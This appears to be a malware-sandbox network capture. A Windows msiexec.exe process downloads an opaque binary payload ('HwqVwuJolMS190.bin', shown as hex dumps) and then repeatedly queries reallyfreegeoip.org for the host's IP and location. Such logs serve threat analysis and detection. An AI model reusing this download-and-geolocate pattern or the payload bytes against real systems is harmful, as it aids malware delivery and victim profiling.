                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-10 16:17:29 UTC4942INHTTP/1.1 200 OK
                                                                                                                                            X-GUploader-UploadID: AFiumC6m1N7Sr4fbOVDpnCSy1hsOCbSPGIuJ_o2IiJLZtm_poWBAQ-ylIztr_E5w3rVLuJovrQFrh1Y
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Content-Security-Policy: sandbox
                                                                                                                                            Content-Security-Policy: default-src 'none'
                                                                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                            X-Content-Security-Policy: sandbox
                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            Content-Disposition: attachment; filename="HwqVwuJolMS190.bin"
                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 277056
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 10:13:31 GMT
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:29 GMT
                                                                                                                                            Expires: Fri, 10 Jan 2025 16:17:29 GMT
                                                                                                                                            Cache-Control: private, max-age=0
                                                                                                                                            X-Goog-Hash: crc32c=0uA8pA==
                                                                                                                                            Server: UploadServer
                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                            Connection: close
                                                                                                                                            2025-01-10 16:17:29 UTC4942INData Raw: ad f0 93 2e f4 8e 13 b2 3a d4 0e 81 d3 31 25 c5 3c 51 ad 06 cf 74 af 35 38 cb 97 e7 bf e7 ef fc 1a 46 e4 77 2a 27 f8 aa 00 84 1b 13 a2 30 5e 9a 45 5c c0 36 70 bc 56 8f e0 64 f5 10 06 de 4b 3b 61 ff ec e9 df 2b ff da 1d 14 3b 0e c3 e7 9e 01 02 9c 5e 90 1d 03 a5 91 00 88 79 18 af f4 41 c5 27 a3 a0 a6 6a 9f 22 ea b6 b1 4c 2c b5 ee 85 ed fc b1 9e 6d 68 4d 2f 74 d5 36 ad 60 ce 0a 13 e3 2b e6 aa ac 61 bc 07 f0 78 81 fb 41 59 fa ce f0 8f 88 07 8e 7f 55 fe 8a 30 e1 ca 1c df 73 36 9a 0d 9c 1a 91 8b a3 13 99 a0 d4 dc 7e ff 99 3d 5c 66 45 4d 15 44 fd 8e 46 8a 1e a1 76 f3 71 a1 2c 0c e4 f7 83 57 d7 11 0b 03 a8 64 69 32 d7 62 77 9e 55 ce bf 4d 8d 66 07 4b 68 48 10 79 5c ae d0 a7 39 f6 fe 6e 6c ed 3b 9a 27 80 79 cf c5 4f 40 a8 fb 31 15 5d 5d a5 17 a0 eb 6a 39 dd 1a 0d
                                                                                                                                            Data Ascii: .:1%<Qt58Fw*'0^E\6pVdK;a+;^yA'j"L,mhM/t6`+axAYU0s6~=\fEMDFvq,Wdi2bwUMfKhHy\9nl;'yO@1]]j9
                                                                                                                                            2025-01-10 16:17:29 UTC4815INData Raw: 4c e4 7e a0 f2 64 5f 77 38 05 29 55 05 04 d0 1e 51 39 f1 5c b3 8a e0 c9 76 de cd 88 f9 84 32 d1 03 78 ac 4a c7 10 3d ca 39 cf ad 51 a5 9f 45 2f 0b de 5f b0 c2 69 b3 cf 16 09 79 8a c0 69 1c 61 fd cd ec 4f 90 46 87 32 9f b1 6e 71 5b 35 f3 f7 a2 3f 9e 23 7a 60 a6 27 72 b4 69 c7 6d 82 90 6d 05 48 c5 64 67 23 d7 ac 10 18 97 e2 24 97 8e 94 cf 7f 9d 80 3d d8 21 db e0 bf cf 6b 95 ae 1b 58 27 fb 40 58 36 74 f6 97 c7 86 61 08 24 ca 86 92 f3 b1 79 48 07 ad 63 0b 1e 1d 54 29 2e 92 34 99 1a 62 19 ae 4d 4c fe 15 78 29 4c 74 c5 18 c4 32 d6 4f 54 15 19 aa 02 4e eb bb d0 65 dd ae 3f 5d 04 96 1d f2 7a ee 85 e9 e9 7f a2 ab a7 e9 ce 8a a7 f7 9b 32 e1 86 cf 12 74 0b 28 32 6f 53 62 dd ee d0 d2 89 9e 40 09 fa be 7b 4e 4d 3b 8f db 1b f2 76 d9 ef 2d 8b 2e b9 6b 04 df 9c 58 d3 8e
                                                                                                                                            Data Ascii: L~d_w8)UQ9\v2xJ=9QE/_iyiaOF2nq[5?#z`'rimmHdg#$=!kX'@X6ta$yHcT).4bMLx)Lt2OTNe?]z2t(2oSb@{NM;v-.kX
                                                                                                                                            2025-01-10 16:17:29 UTC1322INData Raw: 26 fe 0d 30 99 24 8f 9f cf 57 8a 1d 58 ff 6a b9 78 dc c9 d1 66 fd 5d e3 b4 5e bb d6 6e 7c 75 18 29 70 6e 82 16 4e ae 6e b7 5e 72 71 a1 26 4a 5f f6 90 1d c7 14 32 19 2f f4 0f 4c f8 62 77 9a 27 bd af ad fd 72 2e c1 69 18 1a 6f 86 ab c3 a0 3c f1 c7 5e 6d ed 3b c4 70 7a 7f f2 e5 4f 46 db 5b 35 15 57 75 24 17 a0 c1 6a 4a 1f 18 0d b7 43 ce 65 64 ec 25 ec c3 e5 70 75 c8 13 5a 79 d4 a5 ef 80 65 c9 38 64 32 90 96 e0 b1 9f 4e 1c 5e 47 dd 87 e8 5d 8d 00 6c 2e f7 08 fc 10 d8 4b fc 78 e8 fa 1b 6b 4f 72 7a 93 b7 0e c4 48 53 bf de 94 4b be 4f b1 28 76 d4 c9 b6 e1 4a 74 ab 9b 90 1e 5f 92 9e 89 cd 6a 96 7c 7d 27 1a 75 5d 4b 44 13 11 8c 3e b8 60 d6 d7 aa 8b 61 b8 cd 5f 4a 0d a2 e8 6d db 7c 10 6c c2 3d 21 ab 39 02 31 04 97 e4 57 e3 ce a0 8c 2b b4 b8 dc f1 1a 35 ee 1d 85 4d
                                                                                                                                            Data Ascii: &0$WXjxf]^n|u)pnNn^rq&J_2/Lbw'r.io<^m;pzOF[5Wu$jJCed%puZye8d2N^G]l.KxkOrzHSKO(vJt_j|}'u]KD>`a_Jm|l=!91W+5M
                                                                                                                                            2025-01-10 16:17:29 UTC1390INData Raw: e5 36 83 99 68 6a 9f 22 c2 ec b1 4c 26 a8 63 c5 ed fc b0 bb 7b 1a 00 20 74 a5 94 88 77 66 be 13 e3 2f 5b 35 ba 13 6f 01 3d 29 9b df 14 ea e3 9a 98 e2 59 02 e4 7f b1 96 f8 21 2e cf 64 c0 37 58 f5 7d 1e 5d e8 d9 48 69 f7 f0 1f 9a 2b bb d6 64 13 57 2a 29 7a 79 d1 98 c1 ee 1e a1 77 d6 67 d3 df 4e a1 87 21 3e c1 3a bf da 2d fe ad 17 cf 10 10 91 55 be 1d 88 94 1a 3e 40 69 1c b2 5c 62 d8 e1 a4 2d 86 5c 46 19 ed 3b ce 77 a6 6f e7 93 4f 40 a2 9b 15 15 51 5d e5 3f d7 cb 6a 33 dd 18 73 82 50 c6 70 7d b3 6d cd d0 e1 73 c8 d7 13 50 12 38 ec ef 8a 6f c9 12 75 b7 90 96 ee e7 9c 4e 1c 5c 28 c5 97 cd 7f b9 11 64 56 7d 3b fc 48 92 ff fc 72 3c 88 b4 7b 4f 7c 65 c8 b7 0a bc b2 96 bf ae 88 63 2e 47 ac af 20 2a c8 a4 e0 4d 22 ca c8 8d e3 bd b7 89 a0 5c 7c e4 3b d0 02 72 a5 1f
                                                                                                                                            Data Ascii: 6hj"L&c{ twf/[5o=)Y!.d7X}]Hi+dW*)zywgN!>:-U>@i\b-\F;woO@Q]?j3sPp}msP8ouN\(dV};Hr<{O|ec.G *M"\|;r
                                                                                                                                            2025-01-10 16:17:29 UTC1390INData Raw: 5e 94 86 1f 0f 42 2f 04 77 13 b4 1e 76 0a 13 e7 87 dc 0a d0 9c 18 0e 4d fb 11 8f 0d 94 d1 f5 50 e6 fb 2d fe 73 11 99 f8 55 ff 07 7f be 17 4b f2 68 ba 17 25 ab d1 6c e6 87 d2 61 5e bb dc 6e 02 37 2a 29 74 19 39 83 4c a4 0d a9 08 c2 71 a1 28 2e 34 f5 83 6b c0 3a 8a da 2d fe 19 cc d6 71 7e 8f 5c e2 b3 bc 85 73 69 8a 69 18 1a 79 78 81 db a7 3c fe e8 01 a6 ed 3b ce 64 84 68 c7 9b 71 40 a8 9f 1d de 5d 5d ef 78 6c cb 6a 33 dd 09 05 c3 6a c6 74 68 ec 24 ec c3 e5 70 0a c8 13 5a 79 dd a5 ef 80 65 c9 38 1a f1 ff 58 ea cf a8 4e 0d 5c 47 d4 87 e8 5d 8d 39 00 5c 6e 1e fc be e0 da d4 4c e2 88 be 68 45 02 7a aa b7 0e c4 f9 94 bf de 9e 35 9a 47 ac a1 44 41 cb b7 b4 4a 2e 67 94 90 64 eb 49 88 b2 72 7b 9d 4f 14 03 02 07 44 6f 44 63 b7 81 cc c6 58 dc c4 a2 57 72 a2 bf d0 37
                                                                                                                                            Data Ascii: ^B/wvMP-sUKh%la^n7*)t9Lq(.4k:-q~\siiyx<;dhq@]]xlj3jth$pZye8XN\G]9\nLhEz5GDAJ.gdIr{ODoDcXWr7
                                                                                                                                            2025-01-10 16:17:29 UTC1390INData Raw: d3 0b 92 68 08 ca 3a 59 39 da 0d 94 ca 9a e6 fa fb 27 fa 62 d4 99 f8 5b fe b0 7e be 6d 4e dd f8 bc 78 fe bd 2f 65 fd 86 84 10 59 bb d6 10 4f 0b 2a 2d 02 ff f2 83 3c b8 36 20 76 f3 7b b7 d2 5d aa f0 ba 3f d7 12 0b ce fd a1 0f 32 d6 4a 5a 9e 55 c4 cd 86 9d 64 76 57 e4 1b 10 79 79 8f c6 d9 69 f6 fe 6a 44 e9 3b c4 62 eb c0 cf e5 45 32 8f 8e 35 65 75 06 e5 17 aa b5 21 39 dd 1c 25 f7 50 c6 7e 12 8d 1f ec c7 c9 49 b6 c8 19 f2 02 04 b1 c7 30 65 d8 3a 7f 74 90 96 eb c3 a2 46 6e 33 38 1b f7 87 ec 8d 11 6e 5c 66 66 be 60 f0 fb 82 3b e2 88 b0 08 f3 02 52 c2 d8 b3 ce 27 9e bf f6 c4 4b af 4d b1 28 76 d4 c9 b6 e1 4a 74 fd 81 90 1e 5f 92 9e 89 cd 6a 96 7c 7d 27 1a 75 5d 4b 44 13 11 8c 3e b8 60 d6 d7 aa 8b 61 b8 cd 5f 4a 0d a2 e8 6d db 7c 26 6c c2 3d ec 60 25 70 a2 a9 b2
                                                                                                                                            Data Ascii: h:Y9'b[~mNx/eYO*-<6 v{]?2JZUdvWyyijD;bE25eu!9%P~I0e:tFn38n\ff`;R'KM(vJt_j|}'u]KD>`a_Jm|&l=`%p
                                                                                                                                            2025-01-10 16:17:29 UTC1390INData Raw: 36 e4 7e 93 99 f8 5b 9f f6 6e a2 72 23 f5 79 b6 6b e9 ba cd 09 5c 80 bd b8 5e aa cc 01 d6 0b 2a 23 70 7b eb ec 97 ae 1e ab 76 f3 49 62 2c 5c a1 f7 83 0d fe 64 0b da 27 f4 2f 32 db 62 77 b6 22 ce bf a7 8d 78 8b 00 69 18 11 5c 6e d8 76 ac 2d 86 d6 2f 6c ed 3d 66 41 93 07 8a e5 4f 44 0a be 2d 67 b6 4c e5 67 88 8b 6a 39 db ba 28 a4 2e 80 74 6c 96 bd c9 d9 93 14 a4 c8 63 f2 33 0b be 62 ca 65 d8 31 2e e1 e2 0f fa cf d2 ec 39 4d 00 af 87 e8 5d 2f 34 7c 2e ff 0d fc 10 52 da e5 50 56 88 b4 71 ed 27 48 ba c4 1c ce 57 36 97 ab 9e 4b a5 e5 84 d0 36 d4 c3 a4 da 2e df f3 94 e0 10 e2 b7 89 a5 51 23 96 76 d5 70 c5 15 3a 34 6c 21 b3 a9 21 d7 46 c7 c3 86 6d 44 a2 b9 d4 98 8c d3 4a 48 e5 2a 0e 6c c2 33 90 91 25 58 ca 0b 97 9e 2b cb bb a0 8c 21 a5 44 dc f1 14 47 05 23 85 3d
                                                                                                                                            Data Ascii: 6~[nr#yk\^*#p{vIb,\d'/2bw"xi\nv-/l=fAOD-gLgj9(.tlc3be1.9M]/4|.RPVq'HW6K6.Q#vp:4l!!FmDJH*l3%X+!DG#=
                                                                                                                                            2025-01-10 16:17:29 UTC1390INData Raw: 7a c2 be 38 f7 80 b7 b2 57 d4 7c 6e 7c 01 2a f7 7c 6a f9 af 4b a7 71 a0 76 f3 7b a1 f0 82 b2 d2 ab 2f d6 12 01 c9 29 f4 27 50 d7 62 7d 43 36 c8 bf ad 8d 64 06 3e 5b 18 10 7d 0a 3f d2 a7 5d e0 d6 ef 6c ed 31 d2 9a 85 6a ca f4 4a 79 62 99 35 15 23 72 e5 17 a4 b9 19 29 dd 68 1b 95 d1 c6 74 66 84 e1 ed d0 e7 12 b0 f1 23 51 16 10 a5 fb 74 63 e5 30 0b f1 e3 56 ea cf a8 66 dd 5a 28 11 87 9b 95 8d 11 6e 4f 69 09 fb 1e ca ff fc 7c 91 4b b4 7b 45 6d 96 c8 b7 04 ce 36 93 d0 1b 9e 4b a5 39 91 a5 36 d0 a6 71 c4 5c 0c e6 85 97 1c 64 a7 89 d1 51 de 96 76 d5 70 ad 17 3a 34 6c 38 b3 a9 2d a9 9f d6 d7 a4 29 55 a5 a2 59 05 0d d2 4b 6d d6 70 01 7a c2 49 21 ab 32 58 1c 0b 97 9e 57 ee a3 d2 eb 2e db 00 7e d4 09 4b a8 21 85 49 60 d4 54 22 02 29 69 57 69 10 f4 8e f0 58 6b e2 63
                                                                                                                                            Data Ascii: z8W|n|*|jKqv{/)'Pb}C6d>[}?]l1jJyb5#r)htf#Qtc0VfZ(nOi|K{Em6K96q\dQvp:4l8-)UYKmpzI!2XW.~K!I`T")iWiXkc
                                                                                                                                            2025-01-10 16:17:29 UTC1390INData Raw: 0d ff 83 3c 0c 3b b8 08 cb 71 a1 28 fe 84 ed f1 2a d5 12 7b 78 08 ef 71 12 d7 62 73 3c 70 d2 cd ea 9b 64 76 e2 41 6d 10 79 72 c5 8c a7 2d fc ed 4c 77 60 7b c4 64 85 5c d9 97 16 57 a8 eb 97 30 4a 75 51 17 a0 c1 c8 1c c5 6a 6a b2 50 b6 d6 49 8b 61 d4 c3 e1 07 14 ed 09 22 27 13 a5 9f 28 4d ad 30 0b fd 83 b5 fc e7 d4 4e 1c 50 28 3b 87 e4 57 8d 39 13 5c 6e 12 fc 60 8e c0 fc 78 e6 99 96 09 36 15 52 b8 c9 11 ce 27 90 97 97 9e 4b a5 56 8f db 76 d4 c9 b3 ec 62 06 e6 92 90 b0 ed 92 a1 95 79 6a 9c 65 fb 02 2a 65 3a 44 4e bd b3 a9 27 c6 26 e1 d7 ae 2d 36 37 bd d4 35 1b fa cb 48 c0 08 2c 92 c3 2a a6 9f 00 5c f4 16 1a d4 f5 cb ba 85 9a 53 e0 66 dc 81 b2 10 87 09 31 4d c2 fb ec 75 2b 58 0e 28 cb 45 4d d5 c9 26 53 e6 c1 56 ab a0 e0 ca 42 0a 59 50 21 f4 cf 61 0b 92 2a 3e
                                                                                                                                            Data Ascii: <;q(*{xqbs<pdvAmyr-Lw`{d\W0JuQjjPIa"'(M0NP(;W9\n`x6R'KVvbyje*e:DN'&-675H,*\Sf1Mu+X(EM&SVBYP!a*>
                                                                                                                                            2025-01-10 16:17:29 UTC1390INData Raw: a8 23 0b da 29 86 9a 30 d7 12 61 b6 d4 ce bf a7 9b 9a 07 53 7b 09 02 55 74 bb c1 b0 42 3c fe 6e 66 ed 3b ef 6f 84 68 de f3 20 8a a8 9b 3f 15 5d 4c f4 69 9e cb 6a 3d f5 d3 0d bd 5a a9 b8 6c 92 15 ec d2 f0 7d 8c c8 13 54 68 2b a5 ef 8e 16 64 30 0b fd ff 5b ea cf a8 4e 0d 4b 39 17 e8 26 57 8d 1b 64 4d 62 77 33 60 f0 f5 fc a6 f2 ad 9c 4f 4f 02 58 db a4 0e e6 45 94 bf d4 40 4b af 47 ac a5 36 aa fc b7 c4 58 74 73 96 90 1e eb 9f 08 a1 79 60 80 88 de 11 16 16 2e 7d bf 62 b3 a9 3a 4b 18 d6 d7 af 0c 52 d0 84 c2 45 7d 70 6f 5f e8 b6 3a 6c c8 9b a6 96 57 17 a7 0b e7 36 d0 d2 c5 98 8c 21 df d2 f9 eb 62 04 93 21 f5 ef e7 ea 30 70 33 2a 6d 85 ee 29 9d b7 c6 58 1b 44 e9 27 09 85 f0 ab 66 77 6f 20 83 d5 a6 2e 3a 92 5a 2c e5 f4 ec 0f 97 44 5e 88 2f 9b 1b 02 de dc 0b 26 81
                                                                                                                                            Data Ascii: #)0aS{UtB<nf;oh ?]Lij=Zl}Th+d0[NK9&WdMbw3`OOXE@KG6Xtsy`.}b:KRE}po_:lW6!b!0p3*m)XD'fwo .:Z,D^/&


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.759373104.21.80.14437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-10 16:17:32 UTC851INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:32 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1840641
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=39k3drqy4Xf8lPa4U3%2B4mmUEsdhlPPnxhsy23O2VIhfXzq08wD0cQJWATCIOHC1aufYGpDchzymXCTgbYBtgmO1iPxikRC5yRWzz28JEDa7NrEn45nf48cwVOnHMeVFrLrkTgaYM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ffdfa527d187d0e-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1963&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1429270&cwnd=244&unsent_bytes=0&cid=973ebe4ce392d80b&ts=171&x=0"
                                                                                                                                            2025-01-10 16:17:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.759374104.21.80.14437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:33 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-10 16:17:33 UTC859INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:33 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1840642
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7tfioflMkDgVlFo%2Bo8yh%2FdjMV%2FIQxGflVr9IPg2zinCvRxfIdir%2FJuraLsFDT6wK4Du2LMTNkkIPjM4ywUWhXZIot11jojs9p170ZjNvfpeVDSGWycFmLUNjCmubl%2BReRKedVeTL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ffdfa584f8442d2-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1639&rtt_var=648&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1781574&cwnd=229&unsent_bytes=0&cid=e8bab479b806af71&ts=149&x=0"
                                                                                                                                            2025-01-10 16:17:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.759376104.21.80.14437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2025-01-10 16:17:35 UTC865INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:34 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1840644
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RV3cgc39KMLbN%2BLpEKT8XdIak5%2BD6oFntGYWheILCc%2BMFVdcaUF%2F%2FdLH0c%2FKHDktP23dzNxjK3eOOB%2FE42l8xl8X2PFpGDyRjKmkukOXZIJVBjxXD5JfUtpm%2BNFUfQYLvA8a4bRG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ffdfa617885c443-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1571&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1750599&cwnd=244&unsent_bytes=0&cid=b006fdbc6a1359d6&ts=173&x=0"
                                                                                                                                            2025-01-10 16:17:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.759378104.21.80.14437864C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-10 16:17:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            2025-01-10 16:17:36 UTC859INHTTP/1.1 200 OK
                                                                                                                                            Date: Fri, 10 Jan 2025 16:17:36 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 362
                                                                                                                                            Connection: close
                                                                                                                                            Age: 1840645
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            cf-cache-status: HIT
                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tiK2FDbTAuci5ec56IGz7wP9QUC4F2RyFK51f%2BPOTWREQMKOh04tIwRvCm5N9BYNWkA%2BbUEmqUWaJy9DtYcIJShozhsghAtt0gmre%2F9Nis9hn%2B3VsF14CKPyw7djJ46KnmZKpiO%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8ffdfa6b184c42d2-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
